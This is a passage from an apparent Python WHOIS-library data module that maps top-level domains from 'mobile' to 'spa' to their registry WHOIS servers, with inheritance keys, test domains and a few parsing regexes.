\"ke\"}\nZZ[\"mobile\"] = {\"_server\": \"whois.nic.mobile\", \"extend\": \"com\", \"_test\": \"nic.mobile\"}\nZZ[\"moda\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"moe\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"moi\"] = {\"_server\": \"whois.nic.moi\", \"extend\": \"com\", \"_test\": \"nic.moi\"}\nZZ[\"mom\"] = {\"_server\": \"whois.nic.mom\", \"extend\": \"com\", \"_test\": \"nic.mom\"}\nZZ[\"monash\"] = {\"_server\": \"whois.nic.monash\", \"extend\": \"com\", \"_test\": \"nic.monash\"}\nZZ[\"money\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"monster\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"mormon\"] = {\"_server\": \"whois.nic.mormon\", \"extend\": \"com\", \"_test\": \"nic.mormon\"}\nZZ[\"mortgage\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"moscow\"] = {\"_server\": \"whois.nic.moscow\", \"extend\": \"com\", \"_test\": \"nic.moscow\"}\nZZ[\"motorcycles\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"mov\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"movie\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mp\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mq\"] = {\"extend\": \"si\", \"_server\": \"whois.mediaserv.net\"}\nZZ[\"mr\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"com\", \"_test\": \"nic.mr\"}\nZZ[\"msk.ru\"] = {\"extend\": \"com.ru\"} # test with: mining.msk.ru\n# ZZ[\"ms\"] = {\"_server\": \"whois.nic.ms\", \"extend\": \"com\", \"_test\": \"nic.ms\"} # whois.nic.ms does not exist\nZZ[\"ms\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mtn\"] = {\"_server\": \"whois.nic.mtn\", \"extend\": \"com\", \"_test\": \"nic.mtn\"}\nZZ[\"mtr\"] = {\"_server\": \"whois.nic.mtr\", \"extend\": \"com\", \"_test\": \"nic.mtr\"}\nZZ[\"mu\"] = {\"extend\": \"bank\"}\nZZ[\"mu\"] = {\"extend\": \"bank\"}\nZZ[\"museum\"] = {\"_server\": \"whois.nic.museum\", \"extend\": \"com\", \"_test\": \"nic.museum\"}\nZZ[\"music\"] = {\"_server\": \"whois.nic.music\", \"extend\": \"com\", \"_test\": \"nic.music\"}\nZZ[\"my\"] = {\"extend\": \"_privateReg\"}\nZZ[\"mz\"] = {\"_server\": \"whois.nic.mz\", \"extend\": \"com\", \"_test\": \"nic.mz\"}\nZZ[\"nab\"] = {\"_server\": \"whois.nic.nab\", \"extend\": \"com\", \"_test\": \"nic.nab\"}\nZZ[\"nagoya\"] = {\"_server\": \"whois.nic.nagoya\", \"extend\": \"com\", \"_test\": \"nic.nagoya\"}\nZZ[\"name\"] = {\"extend\": \"com\", \"status\": R(r\"Domain Status:\\s?(.+)\")}\nZZ[\"na\"] = {\"_server\": \"whois.na-nic.com.na\", \"extend\": \"com\"}\nZZ[\"natura\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"navy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nec\"] = {\"_server\": \"whois.nic.nec\", \"extend\": \"com\", \"_test\": \"nic.nec\"}\nZZ[\"ne.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"ne.ke\"] = {\"extend\": \"ke\"}\nZZ[\"netbank\"] = {\"_server\": \"whois.nic.netbank\", \"extend\": \"com\", \"_test\": \"nic.netbank\"}\nZZ[\"net.bd\"] = {\"extend\": \"bd\"}\nZZ[\"net\"] = {\"extend\": \"com\"}\nZZ[\"net.ph\"] = {\"extend\": \"ph\"}\nZZ[\"net.rw\"] = {\"extend\": \"rw\"}\nZZ[\"net.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"trt.net.tr\"}\nZZ[\"net.ua\"] = {\"extend\": \"ua\"}\nZZ[\"net.ve\"] = {\"extend\": \"ve\"}\nZZ[\"network\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"net.za\"] = {\"extend\": \"za\", \"_server\": \"net-whois.registry.net.za\"}\nZZ[\"new\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"news\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nextdirect\"] = {\"_server\": \"whois.nic.nextdirect\", \"extend\": \"com\", \"_test\": \"nic.nextdirect\"}\nZZ[\"next\"] = {\"_server\": \"whois.nic.next\", \"extend\": \"com\", \"_test\": \"nic.next\"}\nZZ[\"nexus\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"nf\"] = {\"_server\": \"whois.nic.nf\", \"extend\": \"com\", \"_test\": \"nic.nf\"}\nZZ[\"ngo\"] = {\"_server\": \"whois.nic.ngo\", \"extend\": \"com\", \"_test\": \"nic.ngo\"}\nZZ[\"ng\"] = {\"_server\": \"whois.nic.net.ng\", \"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"nhk\"] = {\"_server\": \"whois.nic.nhk\", \"extend\": \"com\", \"_test\": \"nic.nhk\"}\nZZ[\"nico\"] = {\"_server\": \"whois.nic.nico\", \"extend\": \"com\", \"_test\": \"nic.nico\"}\nZZ[\"nikon\"] = {\"_server\": \"whois.nic.nikon\", \"extend\": \"com\", \"_test\": \"nic.nikon\"}\nZZ[\"ninja\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"nissan\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"nissay\"] = {\"_server\": \"whois.nic.nissay\", \"extend\": \"com\", \"_test\": \"nic.nissay\"}\nZZ[\"noip.com\"] = {\"extend\": \"_privateReg\"}\nZZ[\"noip.org\"] = {\"extend\": \"_privateReg\"}\nZZ[\"nokia\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"norton\"] = {\"_server\": \"whois.nic.norton\", \"extend\": \"com\", \"_test\": \"nic.norton\"}\nZZ[\"nowruz\"] = {\"_server\": \"whois.nic.nowruz\", \"extend\": \"com\", \"_test\": \"nic.nowruz\"}\nZZ[\"now\"] = {\"_server\": \"whois.nic.now\", \"extend\": \"com\", \"_test\": \"nic.now\"}\nZZ[\"nowtv\"] = {\"_server\": \"whois.nic.nowtv\", \"extend\": \"com\", \"_test\": \"nic.nowtv\"}\nZZ[\"np\"] = {\"extend\": \"_privateReg\"}\nZZ[\"nra\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"nrw\"] = {\"extend\": \"com\"}\nZZ[\"nu\"] = {\"extend\": \"se\"}\nZZ[\"obi\"] = {\"_server\": \"whois.nic.obi\", \"extend\": \"com\", \"_test\": \"nic.obi\"}\nZZ[\"observer\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.observer\", \"_test\": \"nic.observer\"}\nZZ[\"okinawa\"] = {\"_server\": \"whois.nic.okinawa\", \"extend\": \"com\", \"_test\": \"nic.okinawa\"}\nZZ[\"olayangroup\"] = {\"_server\": \"whois.nic.olayangroup\", \"extend\": \"com\", \"_test\": \"nic.olayangroup\"}\nZZ[\"olayan\"] = {\"_server\": \"whois.nic.olayan\", \"extend\": \"com\", \"_test\": \"nic.olayan\"}\nZZ[\"ollo\"] = {\"_server\": \"whois.nic.ollo\", \"extend\": \"com\", \"_test\": \"nic.ollo\"}\nZZ[\"omega\"] = {\"_server\": \"whois.nic.omega\", \"extend\": \"com\", \"_test\": \"nic.omega\"}\nZZ[\"om\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"com\", \"_test\": \"registry.om\"}\nZZ[\"one\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.one\", \"_test\": \"nic.one\"}\nZZ[\"ong\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"onl\"] = {\"extend\": \"com\"}\nZZ[\"online\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ooo\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"oracle\"] = {\"_server\": \"whois.nic.oracle\", \"extend\": \"com\", \"_test\": \"nic.oracle\"}\nZZ[\"orange\"] = {\"_server\": \"whois.nic.orange\", \"extend\": \"com\", \"_test\": \"nic.orange\"}\nZZ[\"organic\"] = {\"_server\": \"whois.nic.organic\", \"extend\": \"com\", \"_test\": \"nic.organic\"}\nZZ[\"org.ph\"] = {\"extend\": \"ph\"}\nZZ[\"org.rw\"] = {\"extend\": \"rw\"}\nZZ[\"org.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"dergipark.org.tr\"}\nZZ[\"org.uk\"] = {\"extend\": \"co.uk\"}\nZZ[\"org.ve\"] = {\"extend\": \"ve\"}\nZZ[\"org.za\"] = {\"extend\": \"za\", \"_server\": \"org-whois.registry.net.za\"}\nZZ[\"org.zw\"] = {\"extend\": \"zw\"}\nZZ[\"origins\"] = {\"_server\": \"whois.nic.origins\", \"extend\": \"com\", \"_test\": \"nic.origins\"}\nZZ[\"or.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"or.ke\"] = {\"extend\": \"ke\"}\nZZ[\"osaka\"] = {\"_server\": \"whois.nic.osaka\", \"extend\": \"com\", \"_test\": \"nic.osaka\"}\nZZ[\"otsuka\"] = {\"_server\": \"whois.nic.otsuka\", \"extend\": \"com\", \"_test\": \"nic.otsuka\"}\nZZ[\"ott\"] = {\"_server\": \"whois.nic.ott\", \"extend\": \"com\", \"_test\": \"nic.ott\"}\nZZ[\"ovh\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ovh\", \"_test\": \"nic.ovh\"}\nZZ[\"page\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"panasonic\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"pa\"] = {\"_privateRegistry\": True}\nZZ[\"paris\"] = {\"_server\": \"whois.nic.paris\", \"extend\": \"com\", \"_test\": \"nic.paris\"}\nZZ[\"pars\"] = {\"_server\": \"whois.nic.pars\", \"extend\": \"com\", \"_test\": \"nic.pars\"}\nZZ[\"partners\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"parts\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"party\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.party\", \"_test\": \"nic.party\"}\nZZ[\"pay\"] = {\"_server\": \"whois.nic.pay\", \"extend\": \"com\", \"_test\": \"nic.pay\"}\nZZ[\"pccw\"] = {\"_server\": \"whois.nic.pccw\", \"extend\": \"com\", \"_test\": \"nic.pccw\"}\nZZ[\"pe\"] = {\"extend\": \"com\", \"registrant\": R(r\"Registrant Name:\\s?(.+)\"), \"admin\": R(r\"Admin Name:\\s?(.+)\")}\nZZ[\"pet\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"phd\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"ph\"] = {\"extend\": \"_privateReg\"}\nZZ[\"ph\"] = {\"extend\": \"_privateReg\"}\nZZ[\"philips\"] = {\"_server\": \"whois.nic.philips\", \"extend\": \"com\", \"_test\": \"nic.philips\"}\nZZ[\"phone\"] = {\"_server\": \"whois.nic.phone\", \"extend\": \"com\", \"_test\": \"nic.phone\"}\nZZ[\"photo\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"photography\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"photos\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"physio\"] = {\"_server\": \"whois.nic.physio\", \"extend\": \"com\", \"_test\": \"nic.physio\"}\nZZ[\"pics\"] = {\"extend\": \"ac\"}\nZZ[\"pictures\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pid\"] = {\"_server\": \"whois.nic.pid\", \"extend\": \"com\", \"_test\": \"nic.pid\"}\nZZ[\"pink\"] = {\"_server\": \"whois.nic.pink\", \"extend\": \"com\", \"_test\": \"nic.pink\"}\nZZ[\"pin\"] = {\"_server\": \"whois.nic.pin\", \"extend\": \"com\", \"_test\": \"nic.pin\"}\nZZ[\"pioneer\"] = {\"_server\": \"whois.nic.pioneer\", \"extend\": \"com\", \"_test\": \"nic.pioneer\"}\nZZ[\"pizza\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pk\"] = {\"extend\": \"_privateReg\"}\nZZ[\"place\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"play\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"playstation\"] = {\"_server\": \"whois.nic.playstation\", \"extend\": \"com\", \"_test\": \"nic.playstation\"}\nZZ[\"plumbing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"plus\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pm\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.pm\", \"_test\": \"nic.pm\"}\nZZ[\"pnc\"] = {\"_server\": \"whois.nic.pnc\", \"extend\": \"com\", \"_test\": \"nic.pnc\"}\nZZ[\"pohl\"] = {\"_server\": \"whois.nic.pohl\", \"extend\": \"com\", \"_test\": \"nic.pohl\"}\nZZ[\"poker\"] = {\"_server\": \"whois.nic.poker\", \"extend\": \"com\", \"_test\": \"nic.poker\"}\nZZ[\"politie\"] = {\"_server\": \"whois.nic.politie\", \"extend\": \"com\", \"_test\": \"nic.politie\"}\nZZ[\"porn\"] = {\"_server\": \"whois.nic.porn\", \"extend\": \"com\", \"_test\": \"nic.porn\"}\nZZ[\"press\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"prime\"] = {\"_server\": \"whois.nic.prime\", \"extend\": \"com\", \"_test\": \"nic.prime\"}\nZZ[\"prod\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"productions\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pro\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.pro\", \"_test\": \"nic.pro\"}\nZZ[\"prof\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"progressive\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"promo\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.promo\", \"_test\": \"nic.promo\"}\nZZ[\"properties\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"property\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"protection\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"pr\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ps\"] = {\"_privateRegistry\": True} # no host can be contacted only http://www.nic.ps\nZZ[\"pub\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"pwc\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"py\"] = {\"extend\": \"_privateReg\"} # Paraguay\nZZ[\"qa\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"com\"}\nZZ[\"qpon\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"quebec\"] = {\"_server\": \"whois.nic.quebec\", \"extend\": \"com\", \"_test\": \"nic.quebec\"}\nZZ[\"quest\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"racing\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.racing\", \"_test\": \"nic.racing\"}\nZZ[\"radio\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.radio\", \"_test\": \"nic.radio\"}\nZZ[\"read\"] = {\"_server\": \"whois.nic.read\", \"extend\": \"com\", \"_test\": \"nic.read\"}\nZZ[\"realestate\"] = {\"_server\": \"whois.nic.realestate\", \"extend\": \"com\", \"_test\": \"nic.realestate\"}\nZZ[\"realty\"] = {\"_server\": \"whois.nic.realty\", \"extend\": \"com\", \"_test\": \"nic.realty\"}\nZZ[\"recipes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"red\"] = {\"extend\": \"com\"}\nZZ[\"redstone\"] = {\"_server\": \"whois.nic.redstone\", \"extend\": \"com\", \"_test\": \"nic.redstone\"}\nZZ[\"redumbrella\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"rehab\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reise\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reisen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"reit\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"reliance\"] = {\"_server\": \"whois.nic.reliance\", \"extend\": \"com\", \"_test\": \"nic.reliance\"}\nZZ[\"ren\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ren\", \"_test\": \"nic.ren\"}\nZZ[\"rentals\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rent\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"repair\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"report\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"republican\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"restaurant\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rest\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"review\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.review\", \"_test\": \"nic.review\"}\nZZ[\"reviews\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rexroth\"] = {\"_server\": \"whois.nic.rexroth\", \"extend\": \"com\", \"_test\": \"nic.rexroth\"}\nZZ[\"richardli\"] = {\"_server\": \"whois.nic.richardli\", \"extend\": \"com\", \"_test\": \"nic.richardli\"}\nZZ[\"rich\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ricoh\"] = {\"_server\": \"whois.nic.ricoh\", \"extend\": \"com\", \"_test\": \"nic.ricoh\"}\nZZ[\"ril\"] = {\"_server\": \"whois.nic.ril\", \"extend\": \"com\", \"_test\": \"nic.ril\"}\nZZ[\"rio\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"rip\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rocks\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"rodeo\"] = {\"_server\": \"whois.nic.rodeo\", \"extend\": \"com\", \"_test\": \"nic.rodeo\"}\nZZ[\"rogers\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"room\"] = {\"_server\": \"whois.nic.room\", \"extend\": \"com\", \"_test\": \"nic.room\"}\nZZ[\"rsvp\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"rugby\"] = {\"_server\": \"whois.nic.rugby\", \"extend\": \"com\", \"_test\": \"nic.rugby\"}\nZZ[\"ruhr\"] = {\"_server\": \"whois.nic.ruhr\", \"extend\": \"com\", \"_test\": \"nic.ruhr\"}\nZZ[\"run\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ru.rf\"] = {\"extend\": \"ru\"}\nZZ[\"rwe\"] = {\"_server\": \"whois.nic.rwe\", \"extend\": \"com\", \"_test\": \"nic.rwe\"}\nZZ[\"rw\"] = {\"extend\": \"com\", \"_server\": \"whois.ricta.org.rw\"}\nZZ[\"ryukyu\"] = {\"_server\": \"whois.nic.ryukyu\", \"extend\": \"com\", \"_test\": \"nic.ryukyu\"}\nZZ[\"saarland\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"safe\"] = {\"_server\": \"whois.nic.safe\", \"extend\": \"com\", \"_test\": \"nic.safe\"}\nZZ[\"safety\"] = {\"_server\": \"whois.nic.safety\", \"extend\": \"com\", \"_test\": \"nic.safety\"}\nZZ[\"sale\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"salon\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"samsclub\"] = {\"_server\": \"whois.nic.samsclub\", \"extend\": \"com\", \"_test\": \"nic.samsclub\"}\nZZ[\"samsung\"] = {\"_server\": \"whois.nic.samsung\", \"extend\": \"com\", \"_test\": \"nic.samsung\"}\nZZ[\"sandvikcoromant\"] = {\"_server\": \"whois.nic.sandvikcoromant\", \"extend\": \"com\", \"_test\": \"nic.sandvikcoromant\"}\nZZ[\"sandvik\"] = {\"_server\": \"whois.nic.sandvik\", \"extend\": \"com\", \"_test\": \"nic.sandvik\"}\nZZ[\"sanofi\"] = {\"_server\": \"whois.nic.sanofi\", \"extend\": \"com\", \"_test\": \"nic.sanofi\"}\nZZ[\"sap\"] = {\"_server\": \"whois.nic.sap\", \"extend\": \"com\", \"_test\": \"nic.sap\"}\nZZ[\"sarl\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"save\"] = {\"_server\": \"whois.nic.save\", \"extend\": \"com\", \"_test\": \"nic.save\"}\nZZ[\"saxo\"] = {\"_server\": \"whois.nic.saxo\", \"extend\": \"com\", \"_test\": \"nic.saxo\"}\nZZ[\"sb\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.net.sb\"}\nZZ[\"sbi\"] = {\"_server\": \"whois.nic.sbi\", \"extend\": \"com\", \"_test\": \"nic.sbi\"}\nZZ[\"sbs\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"sca\"] = {\"_server\": \"whois.nic.sca\", \"extend\": \"com\", \"_test\": \"nic.sca\"}\nZZ[\"scb\"] = {\"_server\": \"whois.nic.scb\", \"extend\": \"com\", \"_test\": \"nic.scb\"}\nZZ[\"schaeffler\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"schmidt\"] = {\"_server\": \"whois.nic.schmidt\", \"extend\": \"com\", \"_test\": \"nic.schmidt\"}\nZZ[\"scholarships\"] = {\"_server\": \"whois.nic.scholarships\", \"extend\": \"com\", \"_test\": \"nic.scholarships\"}\nZZ[\"school\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"schule\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"schwarz\"] = {\"_server\": \"whois.nic.schwarz\", \"extend\": \"com\", \"_test\": \"nic.schwarz\"}\nZZ[\"science\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.science\", \"_test\": \"nic.science\"}\nZZ[\"sc.ke\"] = {\"extend\": \"ke\"}\nZZ[\"scot\"] = {\"_server\": \"whois.nic.scot\", \"extend\": \"com\", \"_test\": \"nic.scot\"}\nZZ[\"sc\"] = {\"_server\": \"whois2.afilias-grs.net\", \"extend\": \"com\"}\nZZ[\"sd\"] = {\"extend\": \"com\", \"_server\": \"whois.sdnic.sd\"}\nZZ[\"search\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"seat\"] = {\"_server\": \"whois.nic.seat\", \"extend\": \"com\", \"_test\": \"nic.seat\"}\nZZ[\"secure\"] = {\"_server\": \"whois.nic.secure\", \"extend\": \"com\", \"_test\": \"nic.secure\"}\nZZ[\"security\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"seek\"] = {\"_server\": \"whois.nic.seek\", \"extend\": \"com\", \"_test\": \"nic.seek\"}\nZZ[\"select\"] = {\"_server\": \"whois.nic.select\", \"extend\": \"com\", \"_test\": \"nic.select\"}\nZZ[\"한국\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"삼성\"] = {\"_server\": \"whois.kr\", \"extend\": \"kr\"}\nZZ[\"닷컴\"] = {\"_server\": \"whois.nic.xn--mk1bu44c\", \"extend\": \"xn--mk1bu44c\"}\nZZ[\"닷넷\"] = {\"_server\": \"whois.nic.xn--t60b56a\", \"extend\": \"xn--t60b56a\"}\nZZ[\"services\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"seven\"] = {\"_server\": \"whois.nic.seven\", \"extend\": \"com\", \"_test\": \"nic.seven\"}\nZZ[\"sew\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"sex\"] = {\"_server\": \"whois.nic.sex\", \"extend\": \"com\", \"_test\": \"nic.sex\"}\nZZ[\"sexy\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"sfr\"] = {\"_server\": \"whois.nic.sfr\", \"extend\": \"com\", \"_test\": \"nic.sfr\"}\nZZ[\"shangrila\"] = {\"_server\": \"whois.nic.shangrila\", \"extend\": \"com\", \"_test\": \"nic.shangrila\"}\nZZ[\"sharp\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"shaw\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"shell\"] = {\"_server\": \"whois.nic.shell\", \"extend\": \"com\", \"_test\": \"nic.shell\"}\nZZ[\"shia\"] = {\"_server\": \"whois.nic.shia\", \"extend\": \"com\", \"_test\": \"nic.shia\"}\nZZ[\"shiksha\"] = {\"_server\": \"whois.nic.shiksha\", \"extend\": \"com\", \"_test\": \"nic.shiksha\"}\nZZ[\"shoes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"shop\"] = {\"extend\": \"com\"}\nZZ[\"shopping\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"shouji\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"show\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"showtime\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"silk\"] = {\"_server\": \"whois.nic.silk\", \"extend\": \"com\", \"_test\": \"nic.silk\"}\nZZ[\"sina\"] = {\"_server\": \"whois.nic.sina\", \"extend\": \"com\", \"_test\": \"nic.sina\"}\nZZ[\"singles\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"site\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"skin\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ski\"] = {\"_server\": \"whois.nic.ski\", \"extend\": \"com\", \"_test\": \"nic.ski\"}\nZZ[\"sky\"] = {\"_server\": \"whois.nic.sky\", \"extend\": \"com\", \"_test\": \"nic.sky\"}\nZZ[\"sl\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.sl\", \"_test\": \"nic.sl\"}\nZZ[\"sling\"] = {\"_server\": \"whois.nic.sling\", \"extend\": \"com\", \"_test\": \"nic.sling\"}\nZZ[\"smart\"] = {\"_server\": \"whois.nic.smart\", \"extend\": \"com\", \"_test\": \"nic.smart\"}\nZZ[\"smile\"] = {\"_server\": \"whois.nic.smile\", \"extend\": \"com\", \"_test\": \"nic.smile\"}\nZZ[\"sncf\"] = {\"_server\": \"whois.nic.sncf\", \"extend\": \"com\", \"_test\": \"nic.sncf\"}\nZZ[\"soccer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"social\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"so\"] = {\"extend\": \"com\"}\nZZ[\"softbank\"] = {\"_server\": \"whois.nic.softbank\", \"extend\": \"com\", \"_test\": \"nic.softbank\"}\nZZ[\"software\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"solar\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"solutions\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"sony\"] = {\"_server\": \"whois.nic.sony\", \"extend\": \"com\", \"_test\": \"nic.sony\"}\nZZ[\"soy\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"space\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"spa\"] = {\"_server\": 